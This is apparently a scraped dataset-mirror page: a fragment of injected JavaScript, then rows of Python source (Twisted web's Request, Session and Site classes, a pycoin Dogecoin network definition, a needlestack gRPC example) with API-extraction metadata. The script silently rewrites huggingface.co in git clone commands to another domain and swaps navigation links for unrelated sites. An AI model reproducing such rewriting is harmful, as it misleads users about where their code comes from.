{ // 获取包含Hugging Face文本的span元素 const spans = link.querySelectorAll('span.whitespace-nowrap, span.hidden.whitespace-nowrap'); spans.forEach(span => { if (span.textContent && span.textContent.trim().match(/Hugging\s*Face/i)) { span.textContent = 'AI快站'; } }); }); // 替换logo图片的alt属性 document.querySelectorAll('img[alt*="Hugging"], img[alt*="Face"]').forEach(img => { if (img.alt.match(/Hugging\s*Face/i)) { img.alt = 'AI快站 logo'; } }); } // 替换导航栏中的链接 function replaceNavigationLinks() { // 已替换标记,防止重复运行 if (window._navLinksReplaced) { return; } // 已经替换过的链接集合,防止重复替换 const replacedLinks = new Set(); // 只在导航栏区域查找和替换链接 const headerArea = document.querySelector('header') || document.querySelector('nav'); if (!headerArea) { return; } // 在导航区域内查找链接 const navLinks = headerArea.querySelectorAll('a'); navLinks.forEach(link => { // 如果已经替换过,跳过 if (replacedLinks.has(link)) return; const linkText = link.textContent.trim(); const linkHref = link.getAttribute('href') || ''; // 替换Spaces链接 - 仅替换一次 if ( (linkHref.includes('/spaces') || linkHref === '/spaces' || linkText === 'Spaces' || linkText.match(/^s*Spacess*$/i)) && linkText !== 'GitHub加速' && linkText !== 'GitHub加速' ) { link.textContent = 'GitHub加速'; link.href = 'https://githubproxy.cc'; link.setAttribute('target', '_blank'); link.setAttribute('rel', 'noopener noreferrer'); replacedLinks.add(link); } // 删除Posts链接 else if ( (linkHref.includes('/posts') || linkHref === '/posts' || linkText === 'Posts' || linkText.match(/^s*Postss*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } // 替换Docs链接 - 仅替换一次 else if ( (linkHref.includes('/docs') || linkHref === '/docs' || linkText === 'Docs' || linkText.match(/^s*Docss*$/i)) && linkText !== 'Vibevoice' ) { link.textContent = 'Vibevoice'; link.href = 'https://vibevoice.info/'; replacedLinks.add(link); } // 替换Pricing链接 - 仅替换一次 else if ( (linkHref.includes('/pricing') || linkHref === '/pricing' || linkText === 'Pricing' || linkText.match(/^s*Pricings*$/i)) && linkText !== 'SoraWatermarkRemover' ) { link.textContent = 'SoraWatermarkRemover'; link.href = 'https://sora2watermarkremover.net/'; replacedLinks.add(link); } // 替换Enterprise链接 else if ( (linkHref.includes('/enterprise') || linkHref === '/enterprise' || linkText === 'Enterprise' || linkText.match(/^s*Enterprises*$/i)) && linkText !== 'VoxCPM' ) { link.textContent = 'VoxCPM'; link.href = 'https://voxcpm.net'; replacedLinks.add(link); } }); // 查找可能嵌套的Spaces和Posts文本 const textNodes = []; function findTextNodes(element) { if (element.nodeType === Node.TEXT_NODE) { const text = element.textContent.trim(); if (text === 'Spaces' || text === 'Posts' || text === 'Enterprise') { textNodes.push(element); } } else { for (const child of element.childNodes) { findTextNodes(child); } } } // 只在导航区域内查找文本节点 findTextNodes(headerArea); // 替换找到的文本节点 textNodes.forEach(node => { const text = node.textContent.trim(); if (text === 'Spaces') { node.textContent = node.textContent.replace(/Spaces/g, 'GitHub加速'); } else if (text === 'Posts') { // 删除Posts文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } else if (text === 'Enterprise') { // 删除Enterprise文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } }); // 标记已替换完成 window._navLinksReplaced = true; } // 替换代码区域中的域名 function replaceCodeDomains() { // 特别处理span.hljs-string和span.njs-string元素 document.querySelectorAll('span.hljs-string, span.njs-string, span[class*="hljs-string"], span[class*="njs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换hljs-string类的span中的域名(移除多余的转义符号) document.querySelectorAll('span.hljs-string, span[class*="hljs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换pre和code标签中包含git clone命令的域名 document.querySelectorAll('pre, code').forEach(element => { if (element.textContent && element.textContent.includes('git clone')) { const text = element.innerHTML; if (text.includes('huggingface.co')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 处理特定的命令行示例 document.querySelectorAll('pre, code').forEach(element => { const text = element.innerHTML; if (text.includes('huggingface.co')) { // 针对git clone命令的专门处理 if (text.includes('git clone') || text.includes('GIT_LFS_SKIP_SMUDGE=1')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 特别处理模型下载页面上的代码片段 document.querySelectorAll('.flex.border-t, .svelte_hydrator, .inline-block').forEach(container => { const content = container.innerHTML; if (content && content.includes('huggingface.co')) { container.innerHTML = content.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 特别处理模型仓库克隆对话框中的代码片段 try { // 查找包含"Clone this model repository"标题的对话框 const cloneDialog = document.querySelector('.svelte_hydration_boundary, [data-target="MainHeader"]'); if (cloneDialog) { // 查找对话框中所有的代码片段和命令示例 const codeElements = cloneDialog.querySelectorAll('pre, code, span'); codeElements.forEach(element => { if (element.textContent && element.textContent.includes('huggingface.co')) { if (element.innerHTML.includes('huggingface.co')) { element.innerHTML = element.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { element.textContent = element.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); } // 更精确地定位克隆命令中的域名 document.querySelectorAll('[data-target]').forEach(container => { const codeBlocks = container.querySelectorAll('pre, code, span.hljs-string'); codeBlocks.forEach(block => { if (block.textContent && block.textContent.includes('huggingface.co')) { if (block.innerHTML.includes('huggingface.co')) { block.innerHTML = block.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { block.textContent = block.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); }); } catch (e) { // 错误处理但不打印日志 } } // 当DOM加载完成后执行替换 if (document.readyState === 'loading') { document.addEventListener('DOMContentLoaded', () => { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); }); } else { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); } // 增加一个MutationObserver来处理可能的动态元素加载 const observer = new MutationObserver(mutations => { // 检查是否导航区域有变化 const hasNavChanges = mutations.some(mutation => { // 检查是否存在header或nav元素变化 return Array.from(mutation.addedNodes).some(node => { if (node.nodeType === Node.ELEMENT_NODE) { // 检查是否是导航元素或其子元素 if (node.tagName === 'HEADER' || node.tagName === 'NAV' || node.querySelector('header, nav')) { return true; } // 检查是否在导航元素内部 let parent = node.parentElement; while (parent) { if (parent.tagName === 'HEADER' || parent.tagName === 'NAV') { return true; } parent = parent.parentElement; } } return false; }); }); // 只在导航区域有变化时执行替换 if (hasNavChanges) { // 重置替换状态,允许再次替换 window._navLinksReplaced = false; replaceHeaderBranding(); replaceNavigationLinks(); } }); // 开始观察document.body的变化,包括子节点 if (document.body) { observer.observe(document.body, { childList: true, subtree: true }); } else { document.addEventListener('DOMContentLoaded', () => { observer.observe(document.body, { childList: true, subtree: true }); }); } })(); \\n\"\n )\n else:\n body = (\n b\"Processing Failed\"\n b\"\"\n b\"Processing Failed\"\n )\n\n self.setResponseCode(http.INTERNAL_SERVER_ERROR)\n self.setHeader(b\"content-type\", b\"text/html\")\n self.setHeader(b\"content-length\", b\"%d\" % (len(body),))\n self.write(body)\n self.finish()\n return reason\n\n def view_write(self, issuer, data):\n \"\"\"Remote version of write; same interface.\"\"\"\n self.write(data)\n\n def view_finish(self, issuer):\n \"\"\"Remote version of finish; same interface.\"\"\"\n self.finish()\n\n def view_addCookie(self, issuer, k, v, **kwargs):\n \"\"\"Remote version of addCookie; same interface.\"\"\"\n self.addCookie(k, v, **kwargs)\n\n def view_setHeader(self, issuer, k, v):\n \"\"\"Remote version of setHeader; same interface.\"\"\"\n self.setHeader(k, v)\n\n def view_setLastModified(self, issuer, when):\n \"\"\"Remote version of setLastModified; same interface.\"\"\"\n self.setLastModified(when)\n\n def view_setETag(self, issuer, tag):\n \"\"\"Remote version of setETag; same interface.\"\"\"\n self.setETag(tag)\n\n def view_setResponseCode(self, issuer, code, message=None):\n \"\"\"\n Remote version of setResponseCode; same interface.\n \"\"\"\n self.setResponseCode(code, message)\n\n def view_registerProducer(self, issuer, producer, streaming):\n \"\"\"Remote version of registerProducer; same interface.\n (requires a remote producer.)\n \"\"\"\n self.registerProducer(_RemoteProducerWrapper(producer), streaming)\n\n def view_unregisterProducer(self, issuer):\n self.unregisterProducer()\n\n ### these calls remain local\n\n _secureSession = None\n _insecureSession = None\n\n @property\n def session(self):\n \"\"\"\n If a session has already been created or looked up with\n L{Request.getSession}, this will return that object. (This will always\n be the session that matches the security of the request; so if\n C{forceNotSecure} is used on a secure request, this will not return\n that session.)\n\n @return: the session attribute\n @rtype: L{Session} or L{None}\n \"\"\"\n if self.isSecure():\n return self._secureSession\n else:\n return self._insecureSession\n\n def getSession(self, sessionInterface=None, forceNotSecure=False):\n \"\"\"\n Check if there is a session cookie, and if not, create it.\n\n By default, the cookie with be secure for HTTPS requests and not secure\n for HTTP requests. If for some reason you need access to the insecure\n cookie from a secure request you can set C{forceNotSecure = True}.\n\n @param forceNotSecure: Should we retrieve a session that will be\n transmitted over HTTP, even if this L{Request} was delivered over\n HTTPS?\n @type forceNotSecure: L{bool}\n \"\"\"\n # Make sure we aren't creating a secure session on a non-secure page\n secure = self.isSecure() and not forceNotSecure\n\n if not secure:\n cookieString = b\"TWISTED_SESSION\"\n sessionAttribute = \"_insecureSession\"\n else:\n cookieString = b\"TWISTED_SECURE_SESSION\"\n sessionAttribute = \"_secureSession\"\n\n session = getattr(self, sessionAttribute)\n\n if session is not None:\n # We have a previously created session.\n try:\n # Refresh the session, to keep it alive.\n session.touch()\n except (AlreadyCalled, AlreadyCancelled):\n # Session has already expired.\n session = None\n\n if session is None:\n # No session was created yet for this request.\n cookiename = b\"_\".join([cookieString] + self.sitepath)\n sessionCookie = self.getCookie(cookiename)\n if sessionCookie:\n try:\n session = self.site.getSession(sessionCookie)\n except KeyError:\n pass\n # if it still hasn't been set, fix it up.\n if not session:\n session = self.site.makeSession()\n self.addCookie(cookiename, session.uid, path=b\"/\", secure=secure)\n\n setattr(self, sessionAttribute, session)\n\n if sessionInterface:\n return session.getComponent(sessionInterface)\n\n return session\n\n def _prePathURL(self, prepath):\n port = self.getHost().port\n if self.isSecure():\n default = 443\n else:\n default = 80\n if port == default:\n hostport = \"\"\n else:\n hostport = \":%d\" % port\n prefix = networkString(\n \"http%s://%s%s/\"\n % (\n self.isSecure() and \"s\" or \"\",\n nativeString(self.getRequestHostname()),\n hostport,\n )\n )\n path = b\"/\".join([quote(segment, safe=b\"\") for segment in prepath])\n return prefix + path\n\n def prePathURL(self):\n return self._prePathURL(self.prepath)\n\n def URLPath(self):\n from twisted.python import urlpath\n\n return urlpath.URLPath.fromRequest(self)\n\n def rememberRootURL(self):\n \"\"\"\n Remember the currently-processed part of the URL for later\n recalling.\n \"\"\"\n url = self._prePathURL(self.prepath[:-1])\n self.appRootURL = url\n\n def getRootURL(self):\n \"\"\"\n Get a previously-remembered URL.\n\n @return: An absolute URL.\n @rtype: L{bytes}\n \"\"\"\n return self.appRootURL\n\n def _handleStar(self):\n \"\"\"\n Handle receiving a request whose path is '*'.\n\n RFC 7231 defines an OPTIONS * request as being something that a client\n can send as a low-effort way to probe server capabilities or readiness.\n Rather than bother the user with this, we simply fast-path it back to\n an empty 200 OK. Any non-OPTIONS verb gets a 405 Method Not Allowed\n telling the client they can only use OPTIONS.\n \"\"\"\n if self.method == b\"OPTIONS\":\n self.setResponseCode(http.OK)\n else:\n self.setResponseCode(http.NOT_ALLOWED)\n self.setHeader(b\"Allow\", b\"OPTIONS\")\n\n # RFC 7231 says we MUST set content-length 0 when responding to this\n # with no body.\n self.setHeader(b\"Content-Length\", b\"0\")\n self.finish()\n\n\n@implementer(iweb._IRequestEncoderFactory)\nclass GzipEncoderFactory:\n \"\"\"\n @cvar compressLevel: The compression level used by the compressor, default\n to 9 (highest).\n\n @since: 12.3\n \"\"\"\n\n _gzipCheckRegex = re.compile(br\"(:?^|[\\s,])gzip(:?$|[\\s,])\")\n compressLevel = 9\n\n def encoderForRequest(self, request):\n \"\"\"\n Check the headers if the client accepts gzip encoding, and encodes the\n request if so.\n \"\"\"\n acceptHeaders = b\",\".join(\n request.requestHeaders.getRawHeaders(b\"accept-encoding\", [])\n )\n if self._gzipCheckRegex.search(acceptHeaders):\n encoding = request.responseHeaders.getRawHeaders(b\"content-encoding\")\n if encoding:\n encoding = b\",\".join(encoding + [b\"gzip\"])\n else:\n encoding = b\"gzip\"\n\n request.responseHeaders.setRawHeaders(b\"content-encoding\", [encoding])\n return _GzipEncoder(self.compressLevel, request)\n\n\n@implementer(iweb._IRequestEncoder)\nclass _GzipEncoder:\n \"\"\"\n An encoder which supports gzip.\n\n @ivar _zlibCompressor: The zlib compressor instance used to compress the\n stream.\n\n @ivar _request: A reference to the originating request.\n\n @since: 12.3\n \"\"\"\n\n _zlibCompressor = None\n\n def __init__(self, compressLevel, request):\n self._zlibCompressor = zlib.compressobj(\n compressLevel, zlib.DEFLATED, 16 + zlib.MAX_WBITS\n )\n self._request = request\n\n def encode(self, data):\n \"\"\"\n Write to the request, automatically compressing data on the fly.\n \"\"\"\n if not self._request.startedWriting:\n # Remove the content-length header, we can't honor it\n # because we compress on the fly.\n self._request.responseHeaders.removeHeader(b\"content-length\")\n return self._zlibCompressor.compress(data)\n\n def finish(self):\n \"\"\"\n Finish handling the request request, flushing any data from the zlib\n buffer.\n \"\"\"\n remain = self._zlibCompressor.flush()\n self._zlibCompressor = None\n return remain\n\n\nclass _RemoteProducerWrapper:\n def __init__(self, remote):\n self.resumeProducing = remote.remoteMethod(\"resumeProducing\")\n self.pauseProducing = remote.remoteMethod(\"pauseProducing\")\n self.stopProducing = remote.remoteMethod(\"stopProducing\")\n\n\nclass Session(components.Componentized):\n \"\"\"\n A user's session with a system.\n\n This utility class contains no functionality, but is used to\n represent a session.\n\n @ivar site: The L{Site} that generated the session.\n @type site: L{Site}\n\n @ivar uid: A unique identifier for the session.\n @type uid: L{bytes}\n\n @ivar _reactor: An object providing L{IReactorTime} to use for scheduling\n expiration.\n\n @ivar sessionTimeout: Time after last modification the session will expire,\n in seconds.\n @type sessionTimeout: L{float}\n\n @ivar lastModified: Time the C{touch()} method was last called (or time the\n session was created). A UNIX timestamp as returned by\n L{IReactorTime.seconds()}.\n @type lastModified: L{float}\n \"\"\"\n\n sessionTimeout = 900\n\n _expireCall = None\n\n def __init__(self, site, uid, reactor=None):\n \"\"\"\n Initialize a session with a unique ID for that session.\n\n @param reactor: L{IReactorTime} used to schedule expiration of the\n session. If C{None}, the reactor associated with I{site} is used.\n \"\"\"\n super().__init__()\n\n if reactor is None:\n reactor = site.reactor\n self._reactor = reactor\n\n self.site = site\n self.uid = uid\n self.expireCallbacks = []\n self.touch()\n self.sessionNamespaces = {}\n\n def startCheckingExpiration(self):\n \"\"\"\n Start expiration tracking.\n\n @return: L{None}\n \"\"\"\n self._expireCall = self._reactor.callLater(self.sessionTimeout, self.expire)\n\n def notifyOnExpire(self, callback):\n \"\"\"\n Call this callback when the session expires or logs out.\n \"\"\"\n self.expireCallbacks.append(callback)\n\n def expire(self):\n \"\"\"\n Expire/logout of the session.\n \"\"\"\n del self.site.sessions[self.uid]\n for c in self.expireCallbacks:\n c()\n self.expireCallbacks = []\n if self._expireCall and self._expireCall.active():\n self._expireCall.cancel()\n # Break reference cycle.\n self._expireCall = None\n\n def touch(self):\n \"\"\"\n Mark the session as modified, which resets expiration timer.\n \"\"\"\n self.lastModified = self._reactor.seconds()\n if self._expireCall is not None:\n self._expireCall.reset(self.sessionTimeout)\n\n\nversion = networkString(f\"TwistedWeb/{copyright.version}\")\n\n\n@implementer(interfaces.IProtocolNegotiationFactory)\nclass Site(http.HTTPFactory):\n \"\"\"\n A web site: manage log, sessions, and resources.\n\n @ivar requestFactory: A factory which is called with (channel)\n and creates L{Request} instances. Default to L{Request}.\n\n @ivar displayTracebacks: If set, unhandled exceptions raised during\n rendering are returned to the client as HTML. Default to C{False}.\n\n @ivar sessionFactory: factory for sessions objects. Default to L{Session}.\n\n @ivar sessions: Mapping of session IDs to objects returned by\n C{sessionFactory}.\n @type sessions: L{dict} mapping L{bytes} to L{Session} given the default\n C{sessionFactory}\n\n @ivar counter: The number of sessions that have been generated.\n @type counter: L{int}\n\n @ivar sessionCheckTime: Deprecated and unused. See\n L{Session.sessionTimeout} instead.\n \"\"\"\n\n counter = 0\n requestFactory = Request\n displayTracebacks = False\n sessionFactory = Session\n sessionCheckTime = 1800\n _entropy = os.urandom\n\n def __init__(self, resource, requestFactory=None, *args, **kwargs):\n \"\"\"\n @param resource: The root of the resource hierarchy. All request\n traversal for requests received by this factory will begin at this\n resource.\n @type resource: L{IResource} provider\n @param requestFactory: Overwrite for default requestFactory.\n @type requestFactory: C{callable} or C{class}.\n\n @see: L{twisted.web.http.HTTPFactory.__init__}\n \"\"\"\n super().__init__(*args, **kwargs)\n self.sessions = {}\n self.resource = resource\n if requestFactory is not None:\n self.requestFactory = requestFactory\n\n def _openLogFile(self, path):\n from twisted.python import logfile\n\n return logfile.LogFile(os.path.basename(path), os.path.dirname(path))\n\n def __getstate__(self):\n d = self.__dict__.copy()\n d[\"sessions\"] = {}\n return d\n\n def _mkuid(self):\n \"\"\"\n (internal) Generate an opaque, unique ID for a user's session.\n \"\"\"\n self.counter = self.counter + 1\n return hexlify(self._entropy(32))\n\n def makeSession(self):\n \"\"\"\n Generate a new Session instance, and store it for future reference.\n \"\"\"\n uid = self._mkuid()\n session = self.sessions[uid] = self.sessionFactory(self, uid)\n session.startCheckingExpiration()\n return session\n\n def getSession(self, uid):\n \"\"\"\n Get a previously generated session.\n\n @param uid: Unique ID of the session.\n @type uid: L{bytes}.\n\n @raise KeyError: If the session is not found.\n \"\"\"\n return self.sessions[uid]\n\n def buildProtocol(self, addr):\n \"\"\"\n Generate a channel attached to this site.\n \"\"\"\n channel = super().buildProtocol(addr)\n channel.requestFactory = self.requestFactory\n channel.site = self\n return channel\n\n isLeaf = 0\n\n def render(self, request):\n \"\"\"\n Redirect because a Site is always a directory.\n \"\"\"\n request.redirect(request.prePathURL() + b\"/\")\n request.finish()\n\n def getChildWithDefault(self, pathEl, request):\n \"\"\"\n Emulate a resource's getChild method.\n \"\"\"\n request.site = self\n return self.resource.getChildWithDefault(pathEl, request)\n\n def getResourceFor(self, request):\n \"\"\"\n Get a resource for a request.\n\n This iterates through the resource hierarchy, calling\n getChildWithDefault on each resource it finds for a path element,\n stopping when it hits an element where isLeaf is true.\n \"\"\"\n request.site = self\n # Sitepath is used to determine cookie names between distributed\n # servers and disconnected sites.\n request.sitepath = copy.copy(request.prepath)\n return resource.getChildForRequest(self.resource, request)\n\n # IProtocolNegotiationFactory\n def acceptableProtocols(self):\n \"\"\"\n Protocols this server can speak.\n \"\"\"\n baseProtocols = [b\"http/1.1\"]\n\n if http.H2_ENABLED:\n baseProtocols.insert(0, b\"h2\")\n\n return baseProtocols\n"},"apis":{"kind":"list like","value":["twisted.python.components.Componentized.__init__","twisted.python.urlpath.URLPath.fromRequest","re.compile","twisted.logger.Logger","twisted.web.resource.getChildForRequest","twisted.web.http.Request.gotLength","copy.copy","zlib.compressobj","twisted.web.resource._IEncodingResource.providedBy","twisted.spread.pb.ViewPoint","incremental.Version","os.path.dirname","twisted.python.failure.Failure","twisted.python.compat.nativeString","twisted.python.reflect.safe_repr","twisted.web.http.Request.finish","twisted.web.resource.ErrorPage","zope.interface.implementer","twisted.web.http.datetimeToString","twisted.python.compat.networkString","twisted.web.http.Request.__init__","os.path.basename","twisted.web.util.formatFailure","twisted.web.http.Request.write"],"string":"[\n \"twisted.python.components.Componentized.__init__\",\n \"twisted.python.urlpath.URLPath.fromRequest\",\n \"re.compile\",\n \"twisted.logger.Logger\",\n \"twisted.web.resource.getChildForRequest\",\n \"twisted.web.http.Request.gotLength\",\n \"copy.copy\",\n \"zlib.compressobj\",\n \"twisted.web.resource._IEncodingResource.providedBy\",\n \"twisted.spread.pb.ViewPoint\",\n \"incremental.Version\",\n \"os.path.dirname\",\n \"twisted.python.failure.Failure\",\n \"twisted.python.compat.nativeString\",\n \"twisted.python.reflect.safe_repr\",\n \"twisted.web.http.Request.finish\",\n \"twisted.web.resource.ErrorPage\",\n \"zope.interface.implementer\",\n \"twisted.web.http.datetimeToString\",\n \"twisted.python.compat.networkString\",\n \"twisted.web.http.Request.__init__\",\n \"os.path.basename\",\n \"twisted.web.util.formatFailure\",\n \"twisted.web.http.Request.write\"\n]"},"extract_api":{"kind":"string","value":"[((2482, 2508), 'zope.interface.implementer', 'implementer', (['iweb.IRequest'], {}), '(iweb.IRequest)\\n', (2493, 2508), False, 'from zope.interface import implementer\\n'), ((20318, 20359), 'zope.interface.implementer', 'implementer', (['iweb._IRequestEncoderFactory'], {}), '(iweb._IRequestEncoderFactory)\\n', (20329, 20359), False, 'from zope.interface import implementer\\n'), ((21320, 21354), 'zope.interface.implementer', 'implementer', (['iweb._IRequestEncoder'], {}), '(iweb._IRequestEncoder)\\n', (21331, 21354), False, 'from zope.interface import implementer\\n'), ((25192, 25240), 'twisted.python.compat.networkString', 'networkString', (['f\"\"\"TwistedWeb/{copyright.version}\"\"\"'], {}), \"(f'TwistedWeb/{copyright.version}')\\n\", (25205, 25240), False, 'from twisted.python.compat import networkString, nativeString\\n'), ((25244, 25295), 'zope.interface.implementer', 'implementer', (['interfaces.IProtocolNegotiationFactory'], {}), '(interfaces.IProtocolNegotiationFactory)\\n', (25255, 25295), False, 'from zope.interface import implementer\\n'), ((1605, 1633), 'incremental.Version', 'Version', (['\"\"\"Twisted\"\"\"', '(12)', '(1)', '(0)'], {}), \"('Twisted', 12, 1, 0)\\n\", (1612, 1633), False, 'from incremental import Version\\n'), ((1778, 1806), 'incremental.Version', 'Version', (['\"\"\"Twisted\"\"\"', '(12)', '(1)', '(0)'], {}), \"('Twisted', 12, 1, 0)\\n\", (1785, 1806), False, 'from incremental import Version\\n'), ((3294, 3302), 'twisted.logger.Logger', 'Logger', ([], {}), '()\\n', (3300, 3302), False, 'from twisted.logger import Logger\\n'), ((20546, 20589), 're.compile', 're.compile', ([\"b'(:?^|[\\\\\\\\s,])gzip(:?$|[\\\\\\\\s,])'\"], {}), \"(b'(:?^|[\\\\\\\\s,])gzip(:?$|[\\\\\\\\s,])')\\n\", (20556, 20589), False, 'import re\\n'), ((3349, 3389), 'twisted.web.http.Request.__init__', 'http.Request.__init__', (['self', '*args'], {}), '(self, *args, **kw)\\n', (3370, 3389), False, 'from twisted.web import iweb, http, util\\n'), ((3398, 3437), 'twisted.python.components.Componentized.__init__', 'components.Componentized.__init__', (['self'], {}), '(self)\\n', (3431, 3437), False, 'from twisted.python import reflect, failure, components\\n'), ((3802, 3825), 'twisted.spread.pb.ViewPoint', 'ViewPoint', (['issuer', 'self'], {}), '(issuer, self)\\n', (3811, 3825), False, 'from twisted.spread.pb import Copyable, ViewPoint\\n'), ((8744, 8769), 'twisted.web.http.Request.finish', 'http.Request.finish', (['self'], {}), '(self)\\n', (8763, 8769), False, 'from twisted.web import iweb, http, util\\n'), ((19036, 19069), 'twisted.python.urlpath.URLPath.fromRequest', 'urlpath.URLPath.fromRequest', (['self'], {}), '(self)\\n', (19063, 19069), False, 'from twisted.python import urlpath\\n'), ((21708, 21775), 'zlib.compressobj', 'zlib.compressobj', (['compressLevel', 'zlib.DEFLATED', '(16 + zlib.MAX_WBITS)'], {}), '(compressLevel, zlib.DEFLATED, 16 + zlib.MAX_WBITS)\\n', (21724, 21775), False, 'import zlib\\n'), ((29168, 29194), 'copy.copy', 'copy.copy', (['request.prepath'], {}), '(request.prepath)\\n', (29177, 29194), False, 'import copy\\n'), ((29210, 29261), 'twisted.web.resource.getChildForRequest', 'resource.getChildForRequest', (['self.resource', 'request'], {}), '(self.resource, request)\\n', (29237, 29261), False, 'from twisted.web import resource\\n'), ((6104, 6127), 'twisted.web.http.datetimeToString', 'http.datetimeToString', ([], {}), '()\\n', (6125, 6127), False, 'from twisted.web import iweb, http, util\\n'), ((6477, 6522), 'twisted.web.resource._IEncodingResource.providedBy', 'resource._IEncodingResource.providedBy', (['resrc'], {}), '(resrc)\\n', (6515, 6522), False, 'from twisted.web import resource\\n'), ((8452, 8482), 'twisted.web.http.Request.write', 'http.Request.write', (['self', 'data'], {}), '(self, data)\\n', (8470, 8482), False, 'from twisted.web import iweb, http, util\\n'), ((27104, 27126), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\\n', (27120, 27126), False, 'import os\\n'), ((27128, 27149), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\\n', (27143, 27149), False, 'import os\\n'), ((5578, 5614), 'twisted.web.http.Request.gotLength', 'http.Request.gotLength', (['self', 'length'], {}), '(self, length)\\n', (5600, 5614), False, 'from twisted.web import iweb, http, util\\n'), ((8698, 8728), 'twisted.web.http.Request.write', 'http.Request.write', (['self', 'data'], {}), '(self, data)\\n', (8716, 8728), False, 'from twisted.web import iweb, http, util\\n'), ((6752, 6769), 'twisted.python.failure.Failure', 'failure.Failure', ([], {}), '()\\n', (6767, 6769), False, 'from twisted.python import reflect, failure, components\\n'), ((11281, 11342), 'twisted.web.resource.ErrorPage', 'resource.ErrorPage', (['http.NOT_ALLOWED', '\"\"\"Method Not Allowed\"\"\"', 's'], {}), \"(http.NOT_ALLOWED, 'Method Not Allowed', s)\\n\", (11299, 11342), False, 'from twisted.web import resource\\n'), ((13642, 13668), 'twisted.web.util.formatFailure', 'util.formatFailure', (['reason'], {}), '(reason)\\n', (13660, 13668), False, 'from twisted.web import iweb, http, util\\n'), ((11024, 11049), 'twisted.python.compat.nativeString', 'nativeString', (['self.method'], {}), '(self.method)\\n', (11036, 11049), False, 'from twisted.python.compat import networkString, nativeString\\n'), ((10965, 10987), 'twisted.python.compat.nativeString', 'nativeString', (['self.uri'], {}), '(self.uri)\\n', (10977, 10987), False, 'from twisted.python.compat import networkString, nativeString\\n'), ((12242, 12265), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['body'], {}), '(body)\\n', (12259, 12265), False, 'from twisted.python import reflect, failure, components\\n'), ((11174, 11189), 'twisted.python.compat.nativeString', 'nativeString', (['x'], {}), '(x)\\n', (11186, 11189), False, 'from twisted.python.compat import networkString, nativeString\\n'), ((12133, 12157), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['resrc'], {}), '(resrc)\\n', (12150, 12157), False, 'from twisted.python import reflect, failure, components\\n'), ((12022, 12045), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['self'], {}), '(self)\\n', (12039, 12045), False, 'from twisted.python import reflect, failure, components\\n')]"}}},{"rowIdx":707,"cells":{"code":{"kind":"string","value":"from pycoin.networks.bitcoinish import create_bitcoinish_network\n\nnetwork = create_bitcoinish_network(\n symbol=\"DOGE\", network_name=\"Dogecoin\", subnet_name=\"mainnet\",\n wif_prefix_hex=\"9e\", address_prefix_hex=\"1e\", pay_to_script_prefix_hex=\"16\",\n bip32_prv_prefix_hex=\"\", bip32_pub_prefix_hex=\"\")\n"},"apis":{"kind":"list like","value":["pycoin.networks.bitcoinish.create_bitcoinish_network"],"string":"[\n \"pycoin.networks.bitcoinish.create_bitcoinish_network\"\n]"},"extract_api":{"kind":"string","value":"[((76, 313), 'pycoin.networks.bitcoinish.create_bitcoinish_network', 'create_bitcoinish_network', ([], {'symbol': '\"\"\"DOGE\"\"\"', 'network_name': '\"\"\"Dogecoin\"\"\"', 'subnet_name': '\"\"\"mainnet\"\"\"', 'wif_prefix_hex': '\"\"\"9e\"\"\"', 'address_prefix_hex': '\"\"\"1e\"\"\"', 'pay_to_script_prefix_hex': '\"\"\"16\"\"\"', 'bip32_prv_prefix_hex': '\"\"\"\"\"\"', 'bip32_pub_prefix_hex': '\"\"\"\"\"\"'}), \"(symbol='DOGE', network_name='Dogecoin',\\n subnet_name='mainnet', wif_prefix_hex='9e', address_prefix_hex='1e',\\n pay_to_script_prefix_hex='16', bip32_prv_prefix_hex='',\\n bip32_pub_prefix_hex='')\\n\", (101, 313), False, 'from pycoin.networks.bitcoinish import create_bitcoinish_network\\n')]"}}},{"rowIdx":708,"cells":{"code":{"kind":"string","value":"import logging\n\nfrom grpc_health.v1 import health_pb2, health_pb2_grpc\nfrom grpc_health.v1.health import HealthServicer\n\nfrom needlestack.apis import servicers_pb2_grpc\nfrom needlestack.servicers import factory\nfrom needlestack.servicers.merger import MergerServicer\n\nfrom examples import configs\n\nlogging.getLogger(\"kazoo\").setLevel(\"WARN\")\n\n\ndef main():\n config = configs.LocalDockerConfig()\n\n server = factory.create_server(config)\n manager = factory.create_zookeeper_cluster_manager(config)\n manager.startup()\n\n servicers_pb2_grpc.add_MergerServicer_to_server(MergerServicer(config, manager), server)\n\n health = HealthServicer()\n health_pb2_grpc.add_HealthServicer_to_server(health, server)\n health.set(\"Merger\", health_pb2.HealthCheckResponse.SERVING)\n\n factory.serve(server)\n\n\nif __name__ == \"__main__\":\n main()\n"},"apis":{"kind":"list like","value":["examples.configs.LocalDockerConfig","logging.getLogger","needlestack.servicers.factory.create_zookeeper_cluster_manager","needlestack.servicers.merger.MergerServicer","grpc_health.v1.health.HealthServicer","needlestack.servicers.factory.serve","needlestack.servicers.factory.create_server","grpc_health.v1.health_pb2_grpc.add_HealthServicer_to_server"],"string":"[\n 